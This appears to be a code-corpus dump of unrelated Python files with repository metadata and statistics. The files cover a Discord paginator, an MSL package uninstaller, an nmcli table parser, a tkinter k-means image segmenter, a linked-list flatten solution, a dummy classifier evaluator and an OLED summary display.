self._parts.insert(0, item)
else:
self._parts.append(item)
class Book:
def __init__(
self,
pag: Paginator,
ctx: typing.Tuple[
typing.Optional[discord.Message],
discord.TextChannel,
discord.ext.commands.Bot,
discord.Message,
],
) -> None:
self._pages = pag.process_pages()
self._len_pages = len(self._pages)
self._current_page = 0
self._message, self._channel, self._bot, self._calling_message = ctx
self._locked = True
if pag == Paginator(self._bot):
raise RuntimeError("Cannot create a book out of an empty Paginator.")
def advance_page(self) -> None:
self._current_page += 1
if self._current_page >= self._len_pages:
self._current_page = 0
def reverse_page(self) -> None:
self._current_page += -1
if self._current_page < 0:
self._current_page = self._len_pages - 1
async def display_page(self) -> None:
if isinstance(self._pages[self._current_page], discord.Embed):
if self._message:
await self._message.edit(
content=None, embed=self._pages[self._current_page]
)
else:
self._message = await self._channel.send(
embed=self._pages[self._current_page]
)
else:
if self._message:
await self._message.edit(
content=self._pages[self._current_page], embed=None
)
else:
self._message = await self._channel.send(
self._pages[self._current_page]
)
async def create_book(self) -> None:
# noinspection PyUnresolvedReferences
async def reaction_checker():
# noinspection PyShadowingNames
def check(reaction, user):
if self._locked:
return (
str(reaction.emoji) in self._bot.book_emojis.values()
and user == self._calling_message.author
and reaction.message.id == self._message.id
)
else:
return (
str(reaction.emoji) in self._bot.book_emojis.values()
and reaction.message.id == self._message.id
)
await self.display_page()
if len(self._pages) > 1:
for emoji in self._bot.book_emojis.values():
try:
await self._message.add_reaction(emoji)
except (discord.Forbidden, KeyError):
pass
else:
try:
await self._message.add_reaction(self._bot.book_emojis["unlock"])
await self._message.add_reaction(self._bot.book_emojis["close"])
except (discord.Forbidden, KeyError):
pass
while True:
try:
reaction, user = await self._bot.wait_for(
"reaction_add", timeout=60, check=check
)
except asyncio.TimeoutError:
try:
await self._message.clear_reactions()
except discord.Forbidden:
pass
raise asyncio.CancelledError
else:
await self._message.remove_reaction(reaction, user)
if str(reaction.emoji) == self._bot.book_emojis["close"]:
await self._calling_message.delete()
await self._message.delete()
raise asyncio.CancelledError
elif str(reaction.emoji) == self._bot.book_emojis["forward"]:
self.advance_page()
elif str(reaction.emoji) == self._bot.book_emojis["back"]:
self.reverse_page()
elif str(reaction.emoji) == self._bot.book_emojis["end"]:
self._current_page = self._len_pages - 1
elif str(reaction.emoji) == self._bot.book_emojis["start"]:
self._current_page = 0
elif str(reaction.emoji) == self._bot.book_emojis["hash"]:
m = await self._channel.send(
f"Please enter a number in range 1 to {self._len_pages}"
)
def num_check(message):
if self._locked:
return (
message.content.isdigit()
and 0 < int(message.content) <= self._len_pages
and message.author == self._calling_message.author
)
else:
return (
message.content.isdigit()
and 0 < int(message.content) <= self._len_pages
)
try:
msg = await self._bot.wait_for(
"message", timeout=30, check=num_check
)
except asyncio.TimeoutError:
await m.edit(content="Message Timed out.")
else:
self._current_page = int(msg.content) - 1
try:
await m.delete()
await msg.delete()
except discord.Forbidden:
pass
elif str(reaction.emoji) == self._bot.book_emojis["unlock"]:
self._locked = False
await self._message.remove_reaction(
reaction, self._channel.guild.me
)
continue
await self.display_page()
self._bot.loop.create_task(reaction_checker())
| 39.824176 | 95 | 0.457174 | 1,719 | 18,120 | 4.534613 | 0.166958 | 0.026555 | 0.028865 | 0.026171 | 0.297755 | 0.249006 | 0.206799 | 0.140603 | 0.102886 | 0.081078 | 0 | 0.008815 | 0.455353 | 18,120 | 454 | 96 | 39.911894 | 0.781032 | 0.126325 | 0 | 0.332454 | 0 | 0 | 0.032554 | 0.00531 | 0 | 0 | 0 | 0 | 0.005277 | 1 | 0.047493 | false | 0.010554 | 0.007916 | 0.005277 | 0.081794 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c19824dda603b18281a6a9aa063606c5a892029 | 4,443 | py | Python | msl/package_manager/uninstall.py | MSLNZ/msl-package-manager | 19d3e8624d4408c37d48c195a440cd2714d4765d | [
"MIT"
] | 3 | 2019-01-14T07:51:30.000Z | 2022-02-16T22:32:42.000Z | msl/package_manager/uninstall.py | MSLNZ/msl-package-manager | 19d3e8624d4408c37d48c195a440cd2714d4765d | [
"MIT"
] | 8 | 2018-06-01T22:00:52.000Z | 2021-10-18T00:59:00.000Z | msl/package_manager/uninstall.py | MSLNZ/msl-package-manager | 19d3e8624d4408c37d48c195a440cd2714d4765d | [
"MIT"
] | null | null | null | """
Uninstall MSL packages.
"""
import os
import sys
import subprocess
import pkg_resources
from . import utils
def uninstall(*names, **kwargs):
"""Uninstall MSL packages.
.. versionchanged:: 2.4.0
Added the `pip_options` keyword argument.
Parameters
----------
*names
The name(s) of the MSL package(s) to uninstall. If not specified then
uninstall all MSL packages (except for the **MSL Package Manager** --
in which case use ``pip uninstall msl-package-manager``). The
``msl-`` prefix can be omitted (e.g., ``'loadlib'`` is equivalent to
``'msl-loadlib'``). Also accepts shell-style wildcards (e.g., ``'pr-*'``).
**kwargs
* yes -- :class:`bool`
If :data:`True` then don't ask for confirmation before uninstalling.
The default is :data:`False` (ask before uninstalling).
* pip_options -- :class:`list` of :class:`str`
Optional arguments to pass to the ``pip uninstall`` command,
e.g., ``['--no-python-version-warning']``
"""
# TODO Python 2.7 does not support named arguments after using *args
# we can define yes=False, pip_options=None in the function signature
# when we choose to drop support for Python 2.7
utils._check_kwargs(kwargs, {'yes', 'pip_options'})
yes = kwargs.get('yes', False)
pip_options = kwargs.get('pip_options', [])
packages = utils._create_uninstall_list(names)
if not packages:
utils.log.info('No MSL packages to uninstall')
return
# use the word REMOVE since it visibly looks different than UNINSTALL and INSTALL do
utils._log_install_uninstall_message(packages, 'REMOVED')
if not (yes or utils._ask_proceed()):
return
# After a MSL package gets uninstalled the "msl" namespace gets destroyed.
# This is a known issue:
# https://github.com/pypa/sample-namespace-packages/issues/5
# https://github.com/pypa/python-packaging-user-guide/issues/314
# There are few ways to bypass this issue
# 1. force all MSL packages to require that the MSL Package Manager is installed
# and only the MSL Package Manager contains the namespace __init__.py file
# 2. modify the setup.py of each namespace package to have "packages=" include
# only the child package.
# 3. what is done below... assume that MSL packages are uninstalled using the
# MSL Package Manager and then re-create the __init__.py files after a
# package is uninstalled.
def check_if_namespace_package(package_name):
for dist in pkg_resources.working_set:
if dist.project_name in package_name:
split = package_name.split('-')
if len(split) != 2:
break
examples_init_file = os.path.join(dist.module_path, split[0], 'examples', '__init__.py')
if not os.path.isfile(examples_init_file):
break
with open(examples_init_file, 'rt') as fp:
examples_init = fp.readlines()
init_file = os.path.join(dist.module_path, split[0], '__init__.py')
if not os.path.isfile(init_file):
break
with open(init_file, 'rt') as fp:
init = fp.readlines()
for line in init:
if '__path__' in line and 'pkgutil' in line:
return True, os.path.dirname(init_file), init, examples_init
return False, None, None, None
utils.log.info('')
exe = [sys.executable, '-m', 'pip', 'uninstall']
if '--quiet' not in pip_options or '-q' not in pip_options:
pip_options.extend(['--quiet'] * utils._pip_quiet)
if '--disable-pip-version-check' not in pip_options:
pip_options.append('--disable-pip-version-check')
if '--yes' not in pip_options or '-y' not in pip_options:
pip_options.append('--yes')
for pkg in packages:
is_namespace, path, init, examples_init = check_if_namespace_package(pkg)
subprocess.call(exe + pip_options + [pkg])
if is_namespace and os.path.isdir(path):
with open(os.path.join(path, '__init__.py'), 'wt') as fp:
fp.writelines(init)
with open(os.path.join(path, 'examples', '__init__.py'), 'wt') as fp:
fp.writelines(examples_init)
| 39.669643 | 104 | 0.618051 | 589 | 4,443 | 4.514431 | 0.336163 | 0.056412 | 0.024445 | 0.028206 | 0.152313 | 0.1132 | 0.087251 | 0.028582 | 0.028582 | 0.028582 | 0 | 0.005255 | 0.271888 | 4,443 | 111 | 105 | 40.027027 | 0.816692 | 0.414135 | 0 | 0.096154 | 0 | 0 | 0.097161 | 0.021591 | 0 | 0 | 0 | 0.009009 | 0 | 1 | 0.038462 | false | 0 | 0.096154 | 0 | 0.211538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1b3346f3b0af3058f0a464cf6e67fa27a93bce | 966 | py | Python | pynmcli/utils.py | kribeku/PyNmcli | fccd6f1e07ab9a95c3444b23cee4c511ec46d100 | [
"MIT"
] | 6 | 2018-06-01T13:17:07.000Z | 2021-01-26T00:52:11.000Z | pynmcli/utils.py | kribeku/PyNmcli | fccd6f1e07ab9a95c3444b23cee4c511ec46d100 | [
"MIT"
] | 1 | 2018-12-12T19:11:19.000Z | 2018-12-12T19:11:19.000Z | pynmcli/utils.py | kribeku/PyNmcli | fccd6f1e07ab9a95c3444b23cee4c511ec46d100 | [
"MIT"
] | 8 | 2018-01-06T09:23:34.000Z | 2022-03-28T13:41:09.000Z | import re
def get_header(table):
header_line = table.split('\n')[0]
regex_word = r'[a-zA-Z0-9_-]+'
headers = []
header_matches = re.finditer(regex_word, header_line)
for header in header_matches:
headers.append({
'title': header.group(),
'start': header.start()
})
return headers
def get_data(table):
headers = get_header(table)
lines = table.split('\n')
data = []
for i in range(1, len(lines)):
di = dict()
line = lines[i]
if line == '':
continue
for h in range(0, len(headers)):
header = headers[h]['title']
start_index = headers[h]['start']
if h >= len(headers) - 1:
di[header] = line[start_index:].strip()
else:
end_index = headers[h + 1]['start']
di[header] = line[start_index:end_index].strip()
data.append(di)
return data
| 26.108108 | 64 | 0.520704 | 118 | 966 | 4.135593 | 0.355932 | 0.081967 | 0.057377 | 0.069672 | 0.090164 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01092 | 0.336439 | 966 | 36 | 65 | 26.833333 | 0.75039 | 0 | 0 | 0 | 0 | 0 | 0.044513 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.032258 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1bc72fb186c51f863c90d91abb4cadc8499c3a | 13,239 | py | Python | parent/venv/apply_k_means_window.py | lugidm/FusariumUNet | 853dc39848b2570a73504e1db57e3ccd26764573 | [
"Unlicense"
] | null | null | null | parent/venv/apply_k_means_window.py | lugidm/FusariumUNet | 853dc39848b2570a73504e1db57e3ccd26764573 | [
"Unlicense"
] | null | null | null | parent/venv/apply_k_means_window.py | lugidm/FusariumUNet | 853dc39848b2570a73504e1db57e3ccd26764573 | [
"Unlicense"
] | null | null | null | from tkinter import filedialog
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import warnings
import math
from point2d import Point2D
from PIL import Image, ImageTk
import os
import errno
from message_box import *
import shutil
import cv2
import numpy as np
import sys as sys
import re as re
from sklearn.cluster import KMeans
from scipy.spatial import distance_matrix
from constants import *
from pyramid_canvas import CanvasImage
initial_search_directory = "."
kernel_size = KERNEL_SIZE
def path_leaf(path):
""" head, tail = os.path.split(path)
return tail or os.path.basename(head)"""
return re.sub('[^A-Za-z0-9]+', '_', path)
class ApplyKMeans:
global kernel_size
def __init__(self, master):
self.root = master
self.root.geometry('900x600')
self.root.columnconfigure(0, weight=1)
self.root.rowconfigure(0, weight=1)
self.k_means_centers_path = os.path.join(K_MEANS_CENTERS, K_MEANS_CENTERS_CSV)
self.filename = ""
self.original_img = None
self.segmented_img = None
self.labels = None
self.nr_centers_val = K_MEANS_NR_CENTERS
self.nr_iterations_val = K_MEANS_NR_ITERATIONS
self.resulting_img_path = None
self.initial_directory = "."
self.pre_centers = None
self.center_names = ['diseased', 'healthy', 'soil', 'rest']
self.displayed_centers = []
self.button_fr = tk.Frame(master)
self.button_fr.grid_rowconfigure(1, weight=1)
self.button_fr.grid_rowconfigure(0, weight=1)
self.button_fr.grid_columnconfigure(0, weight=1)
self.button_fr.grid_columnconfigure(1, weight=1)
self.button_fr.grid_columnconfigure(2, weight=1)
self.original = tk.BooleanVar()
self.ch0 = tk.BooleanVar()
self.ch1 = tk.BooleanVar()
self.ch2 = tk.BooleanVar()
self.ch3 = tk.BooleanVar()
self.ch4 = tk.BooleanVar()
self.ch5 = tk.BooleanVar()
self.ch6 = tk.BooleanVar()
self.ch7 = tk.BooleanVar()
self.ch8 = tk.BooleanVar()
self.ch9 = tk.BooleanVar()
self.wanted_clusters = [self.ch0, self.ch1, self.ch2, self.ch3, self.ch4, self.ch5, self.ch6, self.ch7,
self.ch8, self.ch9]
self.pr0 = tk.StringVar()
self.pr1 = tk.StringVar()
self.pr2 = tk.StringVar()
self.pr3 = tk.StringVar()
self.pr4 = tk.StringVar()
self.pr5 = tk.StringVar()
self.pr6 = tk.StringVar()
self.pr7 = tk.StringVar()
self.pr8 = tk.StringVar()
self.pr9 = tk.StringVar()
self.percentages = [self.pr0, self.pr1, self.pr2, self.pr3, self.pr4, self.pr5, self.pr6, self.pr7,
self.pr8, self.pr9]
self.search_bt = tk.Button(self.button_fr, text="Search Image", command=self.search)
self.search_bt.grid(row=0, column=1)
self.calculate_k_means_bt = tk.Button(self.button_fr, text="(Re)Run K-Means", command=self.calculate,
fg='green')
self.calculate_k_means_bt.grid(row=0, column=0)
self.quit_bt = tk.Button(self.button_fr, text="QUIT", fg="red", command=self.root.destroy)
self.quit_bt.grid(row=0, column=2)
self.img_name_entry = tk.Entry(self.button_fr)
self.img_name_entry.grid(row=1, columnspan=3, pady=2, sticky='EW')
self.img_name_entry.insert(0, self.filename)
self.button_fr.pack()
self.frame_canvas = tk.Frame(self.root, bg='black', relief='sunken', bd=1)
self.frame_canvas.rowconfigure(1, weight=1)
self.frame_canvas.columnconfigure(1, weight=1)
self.canvas = None
self.frame_canvas.pack(fill=tk.BOTH, expand=1, side='left')
self.all_options_fr = tk.Frame(self.root, relief='sunken', bd=1)
self.all_options_fr.rowconfigure(0, weight=1)
self.all_options_fr.pack(expand=1, side='right')
self.original_or_cluster_fr = tk.Frame(self.all_options_fr, relief='sunken', bd=1)
self.original_or_cluster_fr.grid(row=1, column=0)
self.original_rd = tk.Radiobutton(self.original_or_cluster_fr, variable=self.original, value=True,
text="original color", command=self.repaint_clusters)
self.original_rd.grid(row=0, column=0)
self.cluster_rd = tk.Radiobutton(self.original_or_cluster_fr, variable=self.original, value=False,
text="color of cluster centers", command=self.repaint_clusters)
self.cluster_rd.grid(row=0, column=1)
self.all_scales_fr = tk.Frame(self.all_options_fr, relief='sunken', bd=1)
self.all_scales_fr.rowconfigure(0, weight=1)
self.all_scales_fr.grid(row=0, column=0, sticky='E')
self.nr_centers_description_lb = tk.Label(self.all_scales_fr, text="#Cluster-Centers, \n4-5 is recommended",
relief='sunken')
self.nr_centers_description_lb.grid(row=0, column=0)
self.nr_centers_sc = tk.Scale(self.all_scales_fr, from_=2, to=10, resolution=1, name="nr_centers_scale")
self.nr_centers_sc.set(K_MEANS_NR_CENTERS)
self.nr_centers_sc.bind("<ButtonRelease-1>", self._update_value)
self.nr_centers_sc.grid(row=1, column=0)
self.nr_iterations_lb = tk.Label(self.all_scales_fr, text="#Iterations", relief='sunken')
self.nr_iterations_lb.grid(row=0, column=1)
self.nr_iterations_sc = tk.Scale(self.all_scales_fr, from_=1, to=20, resolution=1, name="nr_iterations_scale")
self.nr_iterations_sc.set(K_MEANS_NR_ITERATIONS)
self.nr_iterations_sc.bind("<ButtonRelease-1>", self._update_value)
self.nr_iterations_sc.grid(row=1, column=1)
self.check_fr = tk.Frame(self.all_options_fr, relief='sunken', bd=1)
self.check_fr.rowconfigure(0, weight=1)
self.check_fr.grid(row=2, column=0)
self.check_lb = tk.Label(self.check_fr, relief='sunken', text='which clusters do you want to display?')
self.check_lb.grid(row=0, column=0, columnspan=2)
self.check_buttons = []
self.percentages_labels = []
for i in range(int(self.nr_centers_sc['to'])):
self.percentages_labels.append(tk.Entry(self.check_fr, textvariable=self.percentages[i]))
self.percentages[i].set("%")
self.check_buttons.append(tk.Checkbutton(self.check_fr, text=str(i + 1), variable=self.wanted_clusters[i],
command=self.repaint_clusters))
if i < 4:
self.check_buttons[-1].configure(text=self.center_names[i])
for i in range(self.nr_centers_val):
self.check_buttons[i].grid(column=0, row=i + 1)
self.percentages_labels[i].grid(column=1, row=i + 1)
"""self.save_img_bt = tk.Button(self.all_options_fr, text="save current picture", command=self.save)
self.save_img_bt.grid(row=2)
self.all_options_fr.pack()"""
def search(self):
global initial_search_directory
filename = filedialog.askopenfilename(initialdir=initial_search_directory, title="Select Image",
filetypes=(("jpeg files", ("*.jpg", "*JPG", "*jpeg", "*JPEG")),
("all files", "*.*")))
if filename is not None and type(filename) == str and filename != "":
self.initial_directory = os.path.split(filename)[0]
self.img_name_entry.delete(0, tk.END)
self.img_name_entry.insert(0, filename)
self.filename = filename
def _update_value(self, event):
old_val = self.nr_centers_val
self.nr_centers_val = self.nr_centers_sc.get()
self.nr_iterations_val = self.nr_iterations_sc.get()
if old_val != self.nr_centers_val:
if old_val > self.nr_centers_val:
for j in range(old_val - 1, self.nr_centers_val - 1, -1):
self.check_buttons[j].grid_remove()
self.wanted_clusters[j].set(False)
self.percentages_labels[j].grid_remove()
for i in range(self.nr_centers_val):
self.check_buttons[i].grid(column=0, row=i + 1)
self.percentages_labels[i].grid(column=1, row=i+1)
def repaint_clusters(self):
total_amount = 0
values = np.zeros(10)
if self.canvas is not None:
self.canvas.destroy()
self.canvas = None
if self.segmented_img is not None and self.labels is not None:
if self.original.get():
new_segmented_image = np.zeros(self.segmented_img.shape, dtype=self.original_img.dtype)
else:
new_segmented_image = np.copy(self.segmented_img)
for i in range(0, len(self.wanted_clusters)):
if self.wanted_clusters[i].get() == False:
if not self.original.get():
new_segmented_image[self.labels == i] = [255, 255, 255]
self.percentages[i].set("0%")
else:
if self.original.get():
new_segmented_image[self.labels == i] = [1, 1, 1]
values[i] = np.count_nonzero(self.labels == i)
total_amount += values[i]
for i in range(0, len(self.percentages)):
if values[i] != 0:
self.percentages[i].set(str("%.2f" % ((values[i] / total_amount) * 100)) + "%")
if self.original.get():
new_segmented_image = new_segmented_image.reshape(self.original_img.shape) * self.original_img
cv2.imwrite(self.resulting_img_path, new_segmented_image.reshape(self.original_img.shape))
if self.canvas is not None:
self.canvas.destroy()
self.canvas = None
self.canvas = CanvasImage(self.frame_canvas, self.resulting_img_path, self)
self.canvas.grid(columnspan=2, rowspan=2)
def calculate(self):
global initial_search_directory
if not os.path.exists(K_MEANS_RESULTS_PATH):
os.mkdir(K_MEANS_RESULTS_PATH)
if not type(self.filename) == str or not os.path.exists(self.filename):
messagebox.showinfo("no file chosen!", "choose a file with search")
return
if self.canvas is not None:
self.canvas.destroy()
self.canvas = None
if not os.path.exists(self.k_means_centers_path):
messagebox.showinfo("There seems to be no cluster-centers in " + self.k_means_centers_path +
". The centers will be set to default-values")
self.pre_centers = None
else:
self.pre_centers = np.genfromtxt(self.k_means_centers_path, delimiter=',').astype(int)
self.resulting_img_path, self.original_img, self.segmented_img, self.labels = apply_k_means(self.filename,
self.nr_centers_val,
self.nr_iterations_val,
self.pre_centers)
self.repaint_clusters()
def apply_k_means(filename, nr_centers=K_MEANS_NR_CENTERS, nr_iterations=K_MEANS_NR_ITERATIONS, pre_centers=None,
img=None):
if img is None: # the image needs to be loaded first
img = cv2.imread(filename, cv2.IMREAD_COLOR)
segmented, colored, centers = k_means_via_sklearn(img, nr_centers, nr_iterations, pre_centers)
path_to_segmented = os.path.join(K_MEANS_RESULTS_PATH, path_leaf(filename) + ".bmp")
cv2.imwrite(path_to_segmented, segmented.reshape(img.shape))
return path_to_segmented, img, segmented, centers
def k_means_via_sklearn(img, nr_centers, nr_iterations, pre_centers):
image = img
pixel_values = image.reshape((-1, 3))
pixel_values = np.uint8(pixel_values)
if pre_centers is None:
messagebox.showinfo("Info", "There seems to be no previously calculated cluster-centers")
pre_centers = np.array([[54, 63, 44],
[95, 112, 85],
[141, 154, 115],
[199, 202, 173]], np.uint8)
pre_centers = np.copy(pre_centers) # make sure the initially read file isnt changed
if nr_centers < 4:
pre_centers = np.delete(pre_centers, range(nr_centers - 1, 3), axis=0)
elif nr_centers > 4:
pre_centers = np.append(pre_centers, np.zeros(shape=(nr_centers - 4, 3)), axis=0)
km = KMeans(n_clusters=nr_centers, init=pre_centers, n_init=1, max_iter=nr_iterations).fit(pixel_values)
centers = km.cluster_centers_
labels = km.labels_
segmented_image = np.uint8(centers[labels.flatten()])
colored = np.zeros(segmented_image.shape, dtype=img.dtype)
return segmented_image, colored, labels
| 47.622302 | 123 | 0.613339 | 1,759 | 13,239 | 4.412166 | 0.169983 | 0.03363 | 0.028476 | 0.018554 | 0.362067 | 0.250225 | 0.201392 | 0.15565 | 0.113645 | 0.091998 | 0 | 0.022576 | 0.273963 | 13,239 | 277 | 124 | 47.794224 | 0.784852 | 0.011557 | 0 | 0.108787 | 0 | 0 | 0.046308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033473 | false | 0 | 0.083682 | 0 | 0.138075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1c72918ad94a6a9926fcf4dc5a3feb761e2424 | 823 | py | Python | 400-499/430.py | linyk9/leetcode | eaaadead32cc9d3884543f4ed832bb3cb5aa68e6 | [
"MIT"
] | null | null | null | 400-499/430.py | linyk9/leetcode | eaaadead32cc9d3884543f4ed832bb3cb5aa68e6 | [
"MIT"
] | null | null | null | 400-499/430.py | linyk9/leetcode | eaaadead32cc9d3884543f4ed832bb3cb5aa68e6 | [
"MIT"
] | null | null | null | """
# Definition for a Node.
class Node:
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution:
def flatten(self, head: 'Node') -> 'Node':
newHead = head
while newHead:
if newHead.child:
h = self.flatten(newHead.child)
newHead.child = None
temp = newHead.next
newHead.next = h
h.prev = newHead
while h.next:
h = h.next
h.next = temp
try:
temp.prev = h
except:
pass
newHead = temp
else:
newHead = newHead.next
return head
| 25.71875 | 47 | 0.426488 | 80 | 823 | 4.3375 | 0.325 | 0.103746 | 0.034582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.492102 | 823 | 31 | 48 | 26.548387 | 0.830144 | 0.223572 | 0 | 0 | 0 | 0 | 0.012678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0.047619 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c1c7aafc21e81bf14864b00d981fadaa0c98a30 | 1,443 | py | Python | scripts/evaluation/eval_dummy.py | SteshinSS/serotonin-affinity | accc2046b51259254513b0180c382ca431bb1c24 | [
"MIT"
] | null | null | null | scripts/evaluation/eval_dummy.py | SteshinSS/serotonin-affinity | accc2046b51259254513b0180c382ca431bb1c24 | [
"MIT"
] | null | null | null | scripts/evaluation/eval_dummy.py | SteshinSS/serotonin-affinity | accc2046b51259254513b0180c382ca431bb1c24 | [
"MIT"
] | null | null | null | import argparse
import json
import logging
from pathlib import Path
import numpy as np
from sklearn.metrics import accuracy_score, f1_score, roc_auc_score
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("Eval-Dummy")
def get_parser():
parser = argparse.ArgumentParser(description="Evaluate dummy model which predicts 0 for all molecules.")
parser.add_argument("dataset_path", type=str, help="Path to dataset to evaluate for")
parser.add_argument(
"output_path", type=str, help="Path to save the evaluation results"
)
return parser
def evaluate(X: np.ndarray, y: np.ndarray):
y_pred = np.zeros_like(y) # predict constant 0
accuracy = accuracy_score(y, y_pred)
log.info(f"Accuracy: {accuracy}")
roc_auc = roc_auc_score(y, y_pred)
log.info(f"ROC AUC: {roc_auc}")
f1 = f1_score(y, y_pred)
log.info(f"F1-Score: {f1}")
result = {
"Accuracy": accuracy,
"ROC_AUC": roc_auc,
"F1-Score": f1,
}
return result
if __name__ == "__main__":
parser = get_parser()
args = parser.parse_args()
log.info(f"Evaluating dummy model on {args.dataset_path} dataset...")
dataset = np.load(args.dataset_path)
result = evaluate(dataset['X'], dataset['y'])
output_path = Path(args.output_path).parent
output_path.mkdir(parents=True, exist_ok=True)
with open(args.output_path, "w") as f:
json.dump(result, f)
| 25.767857 | 108 | 0.68122 | 208 | 1,443 | 4.538462 | 0.375 | 0.044492 | 0.033898 | 0.034958 | 0.181144 | 0.164195 | 0.060381 | 0 | 0 | 0 | 0 | 0.007765 | 0.196812 | 1,443 | 55 | 109 | 26.236364 | 0.80673 | 0.012474 | 0 | 0 | 0 | 0 | 0.208714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.153846 | 0 | 0.25641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c20ab47d56935f9a39ecd711da5b2ef5c402d78 | 1,893 | py | Python | rpimonitor/display/summary.py | rob-blackbourn/rpiteenydisplay | 9c2a418619805d01fc9d58980a5351fe718bf7f3 | [
"MIT"
] | 2 | 2019-05-13T19:40:54.000Z | 2020-01-09T03:46:55.000Z | rpimonitor/display/summary.py | rob-blackbourn/rpiteenydisplay | 9c2a418619805d01fc9d58980a5351fe718bf7f3 | [
"MIT"
] | null | null | null | rpimonitor/display/summary.py | rob-blackbourn/rpiteenydisplay | 9c2a418619805d01fc9d58980a5351fe718bf7f3 | [
"MIT"
] | null | null | null | """Draw summary"""
from luma.core.render import canvas
def draw_summary_text(device, font, cpu_usage, mem_usage, cpu_temp):
"""Draw the summary as text"""
cpu_usage_text = f"{cpu_usage:.0%}"
mem_usage_text = f"{mem_usage:.0%}"
cpu_temp_text = f"{cpu_temp:.0f}\u2103"
with canvas(device) as draw:
hundred_pct_width = draw.textsize("100%", font=font)[0]
hundred_degc_width = draw.textsize("100\u2103", font=font)[0]
cpu_title_width = draw.textsize("CPU", font=font)[0]
mem_title_width = draw.textsize("Mem", font=font)[0]
temp_title_width = draw.textsize("Temp", font=font)[0]
cpu_width = max(cpu_title_width, hundred_pct_width)
mem_width = max(mem_title_width, hundred_pct_width)
temp_width = max(temp_title_width, hundred_degc_width)
cpu_usage_width = draw.textsize(cpu_usage_text, font=font)[0]
mem_usage_width = draw.textsize(mem_usage_text, font=font)[0]
cpu_temp_width = draw.textsize(cpu_temp_text, font=font)[0]
cpu_title_pad = cpu_width - cpu_title_width
cpu_usage_pad = cpu_width - cpu_usage_width
mem_title_pad = mem_width - mem_title_width
mem_usage_pad = mem_width - mem_usage_width
temp_title_pad = temp_width - temp_title_width
cpu_temp_pad = temp_width - cpu_temp_width
x0, x1, x2 = 0, 45, 90
y0, y1 = 0, 20
draw.text((x0 + cpu_title_pad, y0), "CPU", fill="white", font=font)
draw.text((x0 + cpu_usage_pad, y1), cpu_usage_text, fill="white", font=font)
draw.text((x1 + mem_title_pad, y0), "Mem", fill="white", font=font)
draw.text((x1 + mem_usage_pad, y1), mem_usage_text, fill="white", font=font)
draw.text((x2 + temp_title_pad, y0), "Temp", fill="white", font=font)
draw.text((x2 + cpu_temp_pad, y1), cpu_temp_text, fill="white", font=font)
| 45.071429 | 84 | 0.661912 | 294 | 1,893 | 3.92517 | 0.142857 | 0.097054 | 0.117851 | 0.088388 | 0.264298 | 0.136049 | 0.114385 | 0.089255 | 0 | 0 | 0 | 0.033356 | 0.208135 | 1,893 | 41 | 85 | 46.170732 | 0.736491 | 0.019546 | 0 | 0 | 0 | 0 | 0.061247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0 | 0.032258 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0c20c070d2359e6105031b0de692ea7e35f6d101 | 8,701 | py | Python | release/scripts/mgear/core/widgets.py | tk-aria/mgear4 | eac1af6882dd7dc4cec1a4b71854040d376704ce | [
"MIT"
] | 72 | 2020-09-28T20:00:59.000Z | 2022-03-25T14:35:14.000Z | release/scripts/mgear/core/widgets.py | Mikfr83/mgear4 | 2fa28080027f1004e8e0139ccf93f7ec2448b1fd | [
"MIT"
] | 101 | 2020-09-28T19:53:53.000Z | 2022-03-31T01:44:41.000Z | release/scripts/mgear/core/widgets.py | Mikfr83/mgear4 | 2fa28080027f1004e8e0139ccf93f7ec2448b1fd | [
